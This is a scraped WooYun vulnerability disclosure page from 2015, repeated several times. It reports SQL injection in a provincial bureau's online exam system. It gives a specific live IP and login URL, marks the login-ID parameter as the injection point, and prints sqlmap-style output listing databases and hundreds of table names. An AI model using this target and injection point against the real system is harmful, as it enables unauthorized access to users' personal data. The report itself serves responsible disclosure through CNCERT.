X省X局在线考试系统SQL注入导致用户信息泄露

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0113475

漏洞标题：X省X局在线考试系统SQL注入导致用户信息泄露

漏洞作者：雅柏菲卡

提交时间：2015-05-11 21:58

修复时间：2015-06-29 16:18

公开时间：2015-06-29 16:18

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：8

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-05-11：细节已通知厂商并且等待厂商处理中
2015-05-15：厂商已经确认，细节仅向厂商公开
2015-05-25：细节向核心白帽子及相关领域专家公开
2015-06-04：细节向普通白帽子公开
2015-06-14：细节向实习白帽子公开
2015-06-29：细节向公众公开

简要描述：

..................

详细说明：

.....................

漏洞证明：

http://117.40.130.22/onlinestudy/index.aspx?__VIEWSTATE=%2FwEPDwUKLTY4NzcyMTIyMmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFDEltYWdlQnV0dG9uMS7NgNwKEO9fwsD8SGkN61JhLhwi&__EVENTVALIDATION=%2FwEWBAKGmLDGCgKdhdqTCgK1qbSRCwLSwpnTCPkJJ83k%2BtSs3f4eytbJUm1KrVsc&txtLoginID=777777777777*&txtPassword=777777777777&ImageButton1.x=37&ImageButton1.y=13
注：*号处为注入点
available databases [22]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] FWOA
[*] JDP
[*] JG_JX
[*] JG_JXV2
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SIX
[*] SIX2
[*] SOAR
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
Database: SIX
[669 tables]
+--------------------------------+
| AAABC                          |
| AAATESTCUSTOMER                |
| ADVICESENDLOG                  |
| AKK_TEST_HTMLSIGNATURE         |
| AKK_TEST_JDA_USER              |
| ALIVESURVEYRECORD              |
| ANQUANPROJECT                  |
| APPEALREASON                   |
| APPEALRESULTRECORD             |
| AREA                           |
| AUTHORITY                      |
| AUTOFOOTPATHDEVICE             |
| A_TEST_ZS_SOURCE               |
| A_TEST_ZS_SOURCE1              |
| BAK_THREETYPE_EXTEN_APPLY      |
| BAK_THREETYPE_EXTEN_AUDITLIST  |
| BAK_THREETYPE_EXTEN_BATCHCODE  |
| BAK_THREETYPE_EXTEN_VERIFY     |
| BIGDANGERRECOGNIZE             |
| BOILER48HOURRUN                |
| BOILERCOOKRECORD               |
| BROADCAST                      |
| BUILDVERTIMEASURE              |
| BULIANGRECORDS                 |
| BUSSINESSPRINT                 |
| BUSSINESS_TEMPLATE             |
| BUS_SAFE_ACCIDENTEXPRESS       |
| BUS_SAFE_PROJECTFINISHAPPLY    |
| CHARGECOMPENAPPLY              |
| CHARGECOMPENAPPLYCHECK         |
| CHARGEDELIVE                   |
| CHECKEVENT                     |
| CHECKEVENTM                    |
| CHECKFLOW                      |
| CHECKFLOWM                     |
| CHECKFLOWNAME                  |
| CHECKFLOWNODE                  |
| CHECKFLOWNODEM                 |
| CHECKFLOWRUNTIMENODE           |
| CHECKLIFT                      |
| CHECKRECORD                    |
| CHECKRECORDM                   |
| CHECKRUNTIMEFLOW               |
| CHECKSTATEM                    |
| CHENJIANGGUACERECORD           |
| CHILIQUANTITYCHECK             |
| CP_MAIN                        |
| CP_OUT                         |
| CP_PROJECT_ADD                 |
| CP_PROJECT_ADDIN               |
| CP_PROJECT_BASEINFO            |
| CP_PROJECT_VERIFY              |
| CR_CRANE_BACKOUT               |
| CR_CRANE_CHANGE                |
| CR_CRANE_DESTORY               |
| CR_CRANE_MOUNT                 |
| CR_CRANE_OPERCHANGE            |
| CR_CRANE_PROJECT               |
| CR_CRANE_REG                   |
| CR_CRANE_REG_ESS               |
| CR_CRANE_REG_PRINTCODE         |
| CR_CRANE_REMOVENOTIFY          |
| CR_CRANE_USED                  |
| CR_CRANE_USEDNOTIFY            |
| CR_CRANE_WRITEOFF              |
| CX_BAK_CR_CRANE_REG            |
| CX_BAK_CR_CRANE_USED           |
| DANAGERBIANSHIMANAGER          |
| DANGERRECONGZIE                |
| DETECTGROUP                    |
| DEVICEOPENCHECK                |
| DIANQIQUANTITYCHECK            |
| DIJIYANCAOCHECK                |
| DOWNLOAD                       |
| DP_PROJECT_ADD                 |
| DP_PROJECT_FINISH              |
| DP_PROJECT_PROGRESBASE         |
| DP_PROJECT_REGISTER            |
| DVRCHANNEL                     |
| DVRDEVICE                      |
| EMAILMANAGE                    |
| FASTGROUP                      |
| FENBAOUNITQUANCHECK            |
| FENBUZHILIANGYANSHOU           |
| FILEPROJECT                    |
| FINISHCONTROLMATERIAL          |
| FINISHFUNCCHECK                |
| FINISHPROYANSHOURECORD         |
| FIVEUNITCHANGE                 |
| FLOORFANGXIANRECORD            |
| FUGONGNOTICE                   |
| FUGONGREPORT                   |
| GANGQUANTITYCHECK              |
| GOVUNITINFO                    |
| GOVUSERINFO                    |
| GROUPDESIGNCHECK               |
| GZCP1                          |
| HAZARDSDISTINGUISH             |
| HAZARDSFACTORLIST              |
| HIDDENCHECKRECORD              |
| HOUSETONGYONGRECORD            |
| HTMLSIGNATURE                  |
| IDGENERATOR                    |
| ITEM                           |
| JC_DETECTGROUPMEMBER           |
| JD_ACELECTROMOTORTEST          |
| JD_AIRCONDITIONRUN             |
| JD_AIRCONDITIONWATERRUN        |
| JD_AIRPIPEWINDDEBUG            |
| JD_ANALOGINPUTDATA             |
| JD_ANALOGOUTPUTDATA            |
| JD_ANCHORCONCRETESG            |
| JD_ANCHORFIXSG                 |
| JD_ANTISEPSISDOPECHECK         |
| JD_APPLYADVICEMODIFY           |
| JD_APTITUDEBUILDDEVICE         |
| JD_APTITUDEBUILDFUNCTION       |
| JD_ARRESTEREARTHTEST           |
| JD_ARRESTERNOGPULL             |
| JD_AUTOFOOTPATHADJACENT        |
| JD_AUTOFOOTPATHDEVICE          |
| JD_AUTOFOOTPATHDQDEVICE        |
| JD_AUTOFOOTPATHWHOLEFIX        |
| JD_AUTOFOOTPATHWHOLETEST       |
| JD_AWARDSSTATE                 |
| JD_BARGAINCHANGING             |
| JD_BASEDISPOSECHECK            |
| JD_BASEEXPLORERECORD           |
| JD_BASEPRJDETECTPLAN           |
| JD_BASICSLOTMEASURE            |
| JD_BOILER48HOURRUN             |
| JD_BOILERBAKERRECORD           |
| JD_BOILERCOOKRECORD            |
| JD_BUILDBOOKCLDJREPORT         |
| JD_BUILDBOOKSZREPORT           |
| JD_BUILDBOOKZJREPORT           |
| JD_BUILDELEVERTIMEASURE        |
| JD_BUILDINGDEVICEFUNCTION      |
| JD_BULKYDQLINENODE             |
| JD_BUSHINGAFFUSESG             |
| JD_CABLEDQCAPABILITY           |
| JD_CEMENTMILLTOFTSG            |
| JD_CEMENTMULRIPLETOFTSG        |
| JD_CHANGESOILSGRECORD          |
| JD_CONCRETEAFFUSERECORD        |
| JD_CONCRETEFACEBUG             |
| JD_CONCRETEIRRIGATEAPPLY       |
| JD_CONCRETEOPENCHECKUP         |
| JD_CONCRETESGREQUISITION       |
| JD_CONCRETESGSLOTSG            |
| JD_CONINTENSITYCHECK           |
| JD_CONPREPIPESG                |
| JD_CREDITRATING                |
| JD_CREEPAGESWITCHTEST          |
| JD_DDCCONTROLLER               |
| JD_DEALDJPROFILEREPORT         |
| JD_DEALDJPROFILEREPORT_ZJZ     |
| JD_DEPTHWELLPRECIPITATION      |
| JD_DEVICEOPENCHECK             |
| JD_DEVICESINGLERUN             |
| JD_DEVICESTATUS                |
| JD_DIANREMETHODINFLICTION      |
| JD_DIGITALINPUTDATA            |
| JD_DIGITALOUTPUTDATA           |
| JD_DJBASEPROJCPLAN             |
| JD_DJBASEPROJCREPORT           |
| JD_DOTASKAFFUSESG              |
| JD_DQDEVICEEMPTYRUN            |
| JD_DQEARTHRESISTANCE           |
| JD_DQELECTRIFYSAFE             |
| JD_DQISOLATIONRESISTANCE       |
| JD_DQLIGHTINGRUN               |
| JD_DUSTCATCHERWINDTEST         |
| JD_DUSTMULRIPLETOFTSG          |
| JD_EACHROOMTEMPMEASURE         |
| JD_EARTHWORKDIGSG              |
| JD_EARTHWORKFILLSG             |
| JD_ELETRICITYWELLRECORD        |
| JD_EVALUATION                  |
| JD_EXHAUSTCHECKRECORD          |
| JD_FEENOTE                     |
| JD_FHBASEDETECTREPORT          |
| JD_FIBERWASTETEST              |
| JD_FIREPROOFDOPECHECK          |
| JD_FLOORDOORFIX                |
| JD_FLOORSCALEFANGXIAN          |
| JD_FRAMEMEMBERSUSPEND          |
| JD_GOVUSERCHECKINFO            |
| JD_GOVUSERDIMISSION            |
| JD_GOVUSERTRANSFER             |
| JD_GRITTOFTSG                  |
| JD_GROUPCHANGEINFO             |
| JD_HIDDENPRO                   |
| JD_HIDDENPRO_AFFG              |
| JD_HIDDENPRO_BHYRB             |
| JD_HIDDENPRO_BJRDD             |
| JD_HIDDENPRO_CNTFYKT           |
| JD_HIDDENPRO_DDGC              |
| JD_HIDDENPRO_DDWJJY            |
| JD_HIDDENPRO_DMGC              |
| JD_HIDDENPRO_DMJNGC            |
| JD_HIDDENPRO_DTCZL             |
| JD_HIDDENPRO_DTDG              |
| JD_HIDDENPRO_DTGSST            |
| JD_HIDDENPRO_DXFS              |
| JD_HIDDENPRO_FGKT              |
| JD_HIDDENPRO_FLJDXT            |
| JD_HIDDENPRO_GJBLYX            |
| JD_HIDDENPRO_GJGC              |
| JD_HIDDENPRO_GJGGC             |
| JD_HIDDENPRO_JCGC              |
| JD_HIDDENPRO_JDJZZ             |
| JD_HIDDENPRO_JKZH              |
| JD_HIDDENPRO_JRFFGD            |
| JD_HIDDENPRO_JSMCMQ            |
| JD_HIDDENPRO_MCGC              |
| JD_HIDDENPRO_MCJN              |
| JD_HIDDENPRO_MHGC              |
| JD_HIDDENPRO_MQ                |
| JD_HIDDENPRO_MQJN              |
| JD_HIDDENPRO_QTJN              |
| JD_HIDDENPRO_QZGQ              |
| JD_HIDDENPRO_RLGDMD            |
| JD_HIDDENPRO_SMB               |
| JD_HIDDENPRO_SSFJCJF           |
| JD_HIDDENPRO_TFGC              |
| JD_HIDDENPRO_TS                |
| JD_HIDDENPRO_WM                |
| JD_HIDDENPRO_WMJNGC            |
| JD_HIDDENPRO_XB                |
| JD_HIDDENPRO_YYLGC             |
| JD_HIDDENPRO_ZJGC              |
| JD_HIDDENPRO_ZMAFGD            |
| JD_HIDDENPRO_ZMBJR             |
| JD_HIDDENPRO_ZMDQ              |
| JD_HIDDENPRO_ZMDQDG            |
| JD_HIGHPRESSUREBASIC           |
| JD_HIGHSTRENGTHPINJOIN         |
| JD_HYDRANTTESTFIRE             |
| JD_INDOORPWPIPETEST            |
| JD_JCITEM                      |
| JD_JCITEM_PKPM                 |
| JD_JCREPORT                    |
| JD_JCUNITAPPLY                 |
| JD_JCUNITCHANGE                |
| JD_JCUNITDELAY                 |
| JD_JCUNITHANDBOOK              |
| JD_JCUNITINFO                  |
| JD_JCUNITINFO_JD_JCITEM        |
| JD_JCUNITINPUTAPPLY            |
| JD_JCUSERINFO                  |
| JD_JCUSERINFO_JD_JCITEM        |
| JD_JIANCEUNITCHECK             |
| JD_JIANZHENGSM                 |
| JD_JLDIARY                     |
| JD_JLWORKCONTACTBILL           |
| JD_JOINTINGMATERIALBAKE        |
| JD_JPWPIPETEST                 |
| JD_JSPROFHBASEDETECTBOOK       |
| JD_JSPROZJJCFILEREPORT         |
| JD_JSTESTREPORTTECBOOK         |
| JD_KEEPHEATMATERIALSG          |
| JD_LARCONSERVETEMP             |
| JD_LARGELAMPSFIRM              |
| JD_LETSMOKEUNITERUN            |
| JD_LIFEJWRINSECHECK            |
| JD_LIFTDQSAFETEST              |
| JD_LIFTDQSETFIXRECORD          |
| JD_LIFTFLOORSAFESET            |
| JD_LIFTFULLYOVERFREIGHT        |
| JD_LIFTFUNCTIONTEST            |
| JD_LIFTMAINFUNCTIONTEST        |
| JD_LIFTYAWPTEST                |
| JD_LIGHTWELLPRECIPITATION      |
| JD_LITTERBALANCEQUOTIETY       |
| JD_LITTERFLATVERACITY          |
| JD_LITTERGUIDESJC              |
| JD_LOWTENSIONDQCONNECT         |
| JD_MAINDEVICE                  |
| JD_MATERIALENTERCHECK          |
| JD_MQINFUSEGLUECHECK           |
| JD_MQSHOWERCHECK               |
| JD_NCAREAPROBASEDETECTPLAN     |
| JD_NEIGHBORJLRECORD            |
| JD_PALAVERRECORD               |
| JD_PARTSAFEPRODETAIL           |
| JD_PEGBASEMEASURE              |
| JD_PEGBASEPROCHECK             |
| JD_PIPEDEVICTEST               |
| JD_PIPEDOUCHETEST              |
| JD_PIPERINSECHECK              |
| JD_PIPEWELLPRECIPITATION       |
| JD_PITSUPPORTMONITOR           |
| JD_POLLUTEDIGESTTEST           |
| JD_POOLFULLTEST                |
| JD_POURSLURRYTOFTSG            |
| JD_POWERCABLELINE              |
| JD_PREPBASESG                  |
| JD_PREPIPESG                   |
| JD_PREPSPREADHOLEAFFUSE        |
| JD_PREPTENDONSPREAD            |
| JD_PROCHECK                    |
| JD_PROJECTFEENOTE              |
| JD_PROJECTLOGOUT               |
| JD_PROPAUSE                    |
| JD_PROPITCHFANGXIAN            |
| JD_PURGEAIRCONDITIONTEST       |
| JD_QUIVERTOFTSG                |
| JD_REDEEMPULLFIX               |
| JD_REFRIGERATIONAIRPROOF       |
| JD_RUNSTATUSCAPITAL            |
| JD_RUNSTATUSPRODUCE            |
| JD_SAFEGROUPCHANGEINFO         |
| JD_SANITATIONWARETEST          |
| JD_SGLOG                       |
| JD_SGPLANCHECK                 |
| JD_SGRECORD                    |
| JD_SIXUSERJCSTATUS             |
| JD_SIXUSERJLSTATUS             |
| JD_SIXUSERKCSTATUS             |
| JD_SIXUSERSGSTATUS             |
| JD_SIXUSERSJSTATUS             |
| JD_SLURRYAFFUSESG              |
| JD_SPECIALTASKPERSONLIST       |
| JD_SPREADDEVICERECORD          |
| JD_STATICPILESG                |
| JD_STEELPILESG                 |
| JD_STEELSTRUCTUREFIXSG         |
| JD_SYNCHRODYNAMOCONNECT        |
| JD_SYSTEMRUNTEST               |
| JD_TAMPTOFTSG                  |
| JD_TEMPLETROOMSG               |
| JD_TESTZPRODETECTPLAN          |
| JD_TESTZZJDETECTREPORT         |
| JD_TOWCHECKTEST                |
| JD_UNDERGROUNDPRORAINPROOF     |
| JD_UNITFEENOTE                 |
| JD_VIDEOSYSTEMTIP              |
| JD_WATERPROOFPROCHECK          |
| JD_WEIGHTGUIDESJC              |
| JD_WINDPIPELEAKLIGHT           |
| JD_WINDPIPELEAKWIND            |
| JD_YINJIPLANLEVER              |
| JD_ZHUANGJIDETECTREPORT        |
| JD_ZHUANGJIEXPEROPION          |
| JD_ZJBSPRODTCRDSELF            |
| JD_ZJBSPRODTCSELF              |
| JD_ZJDCREPORTTECSCJD           |
| JD_ZJJDO                       |
| JD_ZJJDOALL                    |
| JD_ZJLOCKRECORD                |
| JD_ZJPROJCFILEREPORT           |
| JD_ZJPROSYZFILEREPORT          |
| JD_ZJUNITID                    |
| JD_ZJ_JCUNIT                   |
| JIANDUJIAODI                   |
| JIANLIEVALUATEREPORT           |
| JIANLIPRONOWPERREG             |
| JIANLIQUANTITYCHECK            |
| JIANLIZHILIANGTIXI             |
| JIANSHEPRONOWPERREG            |
| JIANSHEQUANTITYCHECK           |
| JIANSHE_ZHILIANGTIXI           |
| JIANZHENGQUYANG                |
| JIANZHUJIENENGCHECK            |
| JICHUQUANTITYCHECK             |
| JISHUIQUANTITYCHECK            |
| JLDIARY                        |
| JLMEETINGSUMMARY               |
| JLNOTICEBOOK                   |
| JLNOTICEBOOKREPLY              |
| JLWORKCONTACTBILL              |
| JSFINISHAPPLY                  |
| JSFINISHREPORT                 |
| JYPITEM                        |
| JYPITEMRECORD                  |
| JYPRECORD                      |
| JYPRECORDTABLE                 |
| JYPTABLE                       |
| JYPTYPE                        |
| KANCHAQUANTITYCHECK            |
| KANCHAZHILIANGTIXI             |
| KCQUALITYCHECKREPORT           |
| LIFTFUNCTIONTEST               |
| LIFTMAINFUNCTIONTEST           |
| LISTENNOTICE                   |
| LOCALQUANMANAGRECORD           |
| MESSAGELOG                     |
| MESSAGELOGRECORD               |
| MESSAGEMOULD                   |
| MHB_APPLY_CHANGE               |
| MHB_APPLY_FAIL                 |
| MHB_APPLY_REISSUE              |
| MHB_APPLY_S3_P0                |
| MHB_APPLY_WRITEOFF             |
| MHB_TEST                       |
| MODULE                         |
| MODULETMP                      |
| MUQIANGQUANTITYCHECK           |
| NEIGHBORJLRECORD               |
| NEWSKILLDEVICE                 |
| NOTFITPRONOTICE                |
| OPERATION                      |
| PACTPLACEVISA                  |
| PALAVERRECORD                  |
| PARTTINGGONGNOTICE             |
| PERSON                         |
| PERSON_JD_JCITEM               |
| PINGJIA                        |
| PIPEDEVICTEST                  |
| PRE_ACCEPT                     |
| PRE_APPROVAL                   |
| PRE_APPROVAL_GETMAXID          |
| PRE_COMPLETE                   |
| PRIVILEGE                      |
| PROCHECK                       |
| PROEQUIPAPPLY                  |
| PROFINISHBAOYAN                |
| PROGENERALINFO                 |
| PROGUARANTEEBOOK               |
| PROIMPPARTCHECK                |
| PROJECT                        |
| PROJECTADVICE                  |
| PROJECTCENCOR                  |
| PROJECTCENCORSTATE             |
| PROJECTEMAIL                   |
| PROJECTFINISHCHECKOPINION      |
| PROJECTFLOW                    |
| PROJECTFLOWRECORD              |
| PROJECTFLOWSTATE               |
| PROJECTITEM                    |
| PROJECTITEMNODE                |
| PROJECTJCINFO                  |
| PROJECTSTAGE                   |
| PROJECT_BACKUP                 |
| PROPAUSE                       |
| PROPAYAPPLY                    |
| PROPAYAPPLYCHECK               |
| PROQUALITYACCIDENTCHECK        |
| PROSAFECONDITION               |
| PROSTARTCHECK                  |
| PROYJDRILL                     |
| PUB_GOVDUTY                    |
| PUB_PARTPROJECT                |
| PUNISHDECIDENOTICE             |
| PUNISHTELLNOTICE               |
| PU_ADDIN                       |
| PU_CODE_BUILD                  |
| PU_DZ_DIFFERENT                |
| PU_DZ_SITE                     |
| PU_DZ_SITETYPE                 |
| PU_DZ_SITETYPENORMAL           |
| PU_OPERATORRIGHT               |
| PU_RECEIPTS_CLASS              |
| PU_RIGHT_LIST                  |
| PU_ROLE                        |
| PU_ROLE_CONTENT                |
| PU_SYS_ANALYSE                 |
| PU_SYS_ATTACH                  |
| PU_SYS_EDITSTYLE               |
| PU_SYS_FRM_INFO                |
| PU_SYS_FRM_SET                 |
| PU_SYS_IMAGE                   |
| PU_SYS_INFO                    |
| PU_SYS_INFOADDIN               |
| PU_SYS_MENU                    |
| PU_SYS_OPERATELOG              |
| PU_SYS_TABLE                   |
| PU_TEMP                        |
| PU_TEMP_TRACE                  |
| PU_T_LIST                      |
| QRTZ_BLOB_TRIGGERS             |
| QRTZ_CALENDARS                 |
| QRTZ_CRON_TRIGGERS             |
| QRTZ_FIRED_TRIGGERS            |
| QRTZ_JOB_DETAILS               |
| QRTZ_JOB_LISTENERS             |
| QRTZ_LOCKS                     |
| QRTZ_PAUSED_TRIGGER_GRPS       |
| QRTZ_SCHEDULER_STATE           |
| QRTZ_SIMPLE_TRIGGERS           |
| QRTZ_TRIGGERS                  |
| QRTZ_TRIGGER_LISTENERS         |
| QUALITYFILEMANAGE              |
| QUANLITYREGTABLE               |
| QUANLITYSKILLJD                |
| QUANTITYJDBOOK                 |
| RECORD_LASTFLOW_ID             |
| RESTDAY                        |
| ROLE                           |
| ROLE_PRIVILEGE                 |
| SAFEEDULOG                     |
| SAFEFUGONGREPORT               |
| SAFEJDBOOK                     |
| SAFEJDCHECKRECORDS             |
| SAFEJDPLAN                     |
| SAFELICENSE                    |
| SAFEPARTTINGGONGNOTICE         |
| SAFETINGGONGNOTICE             |
| SAFEZHENGGAINOTICE             |
| SAFE_SAFEPROJECTSYSJIANLI      |
| SAFE_SYSJIANLIFORMULATE        |
| SCHEDULE                       |
| SERIALNUMBER                   |
| SGDRAWINGCHECK                 |
| SGPLANCHECK                    |
| SGRECORD                       |
| SHEJICHECKREPORT               |
| SHEJIQUANTITYCHECK             |
| SHEJIZHILIANGTIXI              |
| SHIGONGFINISHREPORT            |
| SHIGONGFINISHSELFCHECK         |
| SHIGONGMEASUREFANGXIAN         |
| SHIGONGPROMANGERPERS           |
| SHIGONGQUANTITYCHECK           |
| SHIGONGSTARTREPORT             |
| SHIGONGZHILIANGTIXI            |
| SHORTMESSAGE                   |
| SIGNRECORD                     |
| SIXPART_GROUP                  |
| SIXPART_GROUPMEMBER            |
| SJQUALITYCHECKREPORT           |
| SPECIALTASKPERSONLIST          |
| SP_AREA_ID                     |
| SP_BASEINFO                    |
| SP_BASEINFO_PRINT              |
| SP_BASETABLE_VERIFY            |
| SP_CAHNGE_VERIFY               |
| SP_CHANGE_APPLY                |
| SP_EXTEN_APPLY                 |
| SP_EXTEN_VERIFY                |
| SP_FIRST_APPLY                 |
| SP_REISSUE_APPLY               |
| SP_REISSUE_VERIFY              |
| SP_USERINFO                    |
| SP_WRITEOFF_APPLY              |
| SP_WRITEOFF_VERIFY             |
| SQ_CMPAREA                     |
| SQ_COMPANY                     |
| SQ_PERSON                      |
| SQ_STUALL                      |
| SQ_WORKPAST                    |
| SUPERVISEGROUP                 |
| SUPERVISEGROUPMEMBER           |
| TEMPDEFERAPPLY                 |
| TEMPDEFERAPPLYCHECK            |
| TEMP_HTMLSIGNATURE             |
| TFHT                           |
| TFKW                           |
| THREETYPE_ATTACH               |
| THREETYPE_BASEINFO             |
| THREETYPE_BASETABLE            |
| THREETYPE_BATCHCODE            |
| THREETYPE_CAHNGPRINT_AUDITLIST |
| THREETYPE_CHANGE               |
| THREETYPE_CHANGEOUT            |
| THREETYPE_CHANGE_BATCHCODE     |
| THREETYPE_CHANGE_REPORT        |
| THREETYPE_CHANGE_VERIFY        |
| THREETYPE_EXTEN_APPLY          |
| THREETYPE_EXTEN_AUDITLIST      |
| THREETYPE_EXTEN_BATCHCODE      |
| THREETYPE_EXTEN_VERIFY         |
| THREETYPE_PRINT_AUDITLIST      |
| THREETYPE_REISSUE              |
| THREETYPE_REISSUE_AUDITLIST    |
| THREETYPE_REISSUE_BATCHCODE    |
| THREETYPE_REISSUE_REPORT       |
| THREETYPE_REISSUE_VERIFY       |
| THREETYPE_SECCERTIFE_AUDITLIST |
| THREETYPE_SECCERTIFE_BASETABLE |
| THREETYPE_SECCERTIFE_BATCHCODE |
| THREETYPE_SECCERTIFE_VERIFY    |
| THREETYPE_VERIFY               |
| THREETYPE_WRITEOFF             |
| THREETYPE_WRITEOFF_REPORT      |
| THREETYPE_WRITEOFF_VERIFY      |
| THREETYPE_WROFFPRINT_AUDITLIST |
| THREETYPE_WROFF_BATCHCODE      |
| TODO                           |
| TODOJC                         |
| TODOZJJC                       |
| TONGFENGQUANTITYCHECK          |
| TONGIRRCHECK                   |
| TTH_AUDIT_ESS                  |
| TTH_PRINT_ESS                  |
| TTP_CODE_NUM                   |
| TTP_RECEIVE_CODE               |
| TTP_ZIZ_BOUND                  |
| T_ATTACH                       |
| T_CLASS                        |
| T_CLASSTEACHER                 |
| T_CLASSTESTATTACH              |
| T_CLASSWORK                    |
| T_CLASSWORKFINISH              |
| T_CLASSWORKQUESTION            |
| T_CLASSWORKREAD                |
| T_COURSEWARE                   |
| T_COURSEWARETIME               |
| T_DEGREE                       |
| T_DEPARTMENT                   |
| T_DISPOSEWORK                  |
| T_DUTYTITLE                    |
| T_EXAM                         |
| T_EXAMREADER                   |
| T_EXAM_BJ                      |
| T_EXAM_BJ_USER                 |
| T_EXAM_USER                    |
| T_FORUM                        |
| T_FORUMRPLY                    |
| T_HGZ                          |
| T_LIBINFO                      |
| T_LITTERPAPERREC               |
| T_LITTLEPAPER                  |
| T_MESSAGE                      |
| T_MSGRECEIVER                  |
| T_PROMPTINFO                   |
| T_REGUSER                      |
| T_RESEARCH                     |
| T_RESEARCHITEM                 |
| T_RESEARCHUSER                 |
| T_SPECIALTY                    |
| T_SUBSCIBE                     |
| T_SYSTEMINFO                   |
| T_TESTPAPER                    |
| T_TESTPAPER_CS                 |
| T_TESTQUEST                    |
| T_TESTQUESTFINISH              |
| T_TESTQUESTION                 |
| T_TESTQUESTIONITEM             |
| T_TESTRESULT                   |
| T_TESTSCORE                    |
| T_TOPIC                        |
| T_USERFAULT                    |
| T_USERINFO                     |
| T_USERINFO_SH                  |
| T_USERINFO_TEMP                |
| T_VOD                          |
| T_WORKTYPE                     |
| T_ZKZ                          |
| UNIT                           |
| UNITFINISHYANSHOU              |
| UNITINPUTRECORD                |
| UNITTYPESYSTEM                 |
| UNIT_BACKUP                    |
| USERS                          |
| USERS_BACKUP                   |
| USERS_PRIVILEGE                |
| USERS_ROLE                     |
| WATERPROOFPROCHECK             |
| WEBFILE                        |
| WORKTASK                       |
| XIANYINGPERSMSG                |
| XINGZHENGPUNISHCHECK           |
| YANLIANREPORT                  |
| YINBIPRONOTICE                 |
| ZDFTZDRXDSBJC                  |
| ZHENGGAINOTICE                 |
| ZHENGGAIREPORT                 |
| ZHILIANGACCIDENT               |
| ZHILIANGJDREPORT               |
| ZHILIANGPROJECT                |
| ZHILIANGRANDCHOUCH             |
| ZHILIANGWORKFANGAN             |
| ZHUANGJIPROJIANCEFANGAN        |
| ZHUANGJIQUANTITYCHECK          |
| ZHUANGSHIQUANTITYCHECK         |
| ZHUTIQUANTITYCHECK             |
| ZLTXCHECK                      |
+--------------------------------+
[INFO] the SQL query used returns 151484 entries

修复方案：

..............................

版权声明：转载请注明来源雅柏菲卡@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：9

确认时间：2015-05-15 16:16

厂商回复：

CNVD确认并复现所述漏洞情况，已经转由CNCERT下发给江西分中心，由江西分中心后续协调网站管理单位处置。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0113475

漏洞标题：X省X局在线考试系统SQL注入导致用户信息泄露

相关厂商：X省X局在线考试系统

漏洞作者：雅柏菲卡

提交时间：2015-05-11 21:58

修复时间：2015-06-29 16:18

公开时间：2015-06-29 16:18

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：8

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源雅柏菲卡@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0113475

漏洞标题：X省X局在线考试系统SQL注入导致用户信息泄露

相关厂商：X省X局在线考试系统

漏洞作者： 雅柏菲卡

提交时间：2015-05-11 21:58

修复时间：2015-06-29 16:18

公开时间：2015-06-29 16:18

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：8

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0113475"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 雅柏菲卡@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：雅柏菲卡

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源雅柏菲卡@乌云